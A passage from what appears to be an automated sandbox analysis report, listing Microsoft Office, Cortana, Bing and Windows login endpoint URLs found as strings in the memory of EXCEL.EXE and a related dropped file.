    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cortana.ai
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cr.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://cr.office.comZ7
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comt
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile~9
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.ai%
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comed
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://directory.services.
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office?$
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1J
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml91;
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5;
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechY;x9
    Source: EXCEL.EXE, 00000000.00000002.608057018.0000000012BE0000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.netF
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.netp
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.coml.
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?G
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: EXCEL.EXE, 00000000.00000002.608057018.0000000012BE0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=16
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=10
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000002.608057018.0000000012BE0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp/R
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingA9p;#
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArts.dllF
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookdll
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickrz8_:.
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://lifecycle.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
    Source: EXCEL.EXE, 00000000.00000003.471459592.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513375649.0000000012F16000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472210677.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.475142492.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608801259.0000000012F1C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471289715.0000000012F16000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413724346.0000000012F20000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.456916079.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513771352.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413524232.0000000012F20000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.512416539.0000000012F16000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/4$
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeo
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://login.windows.local
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.-
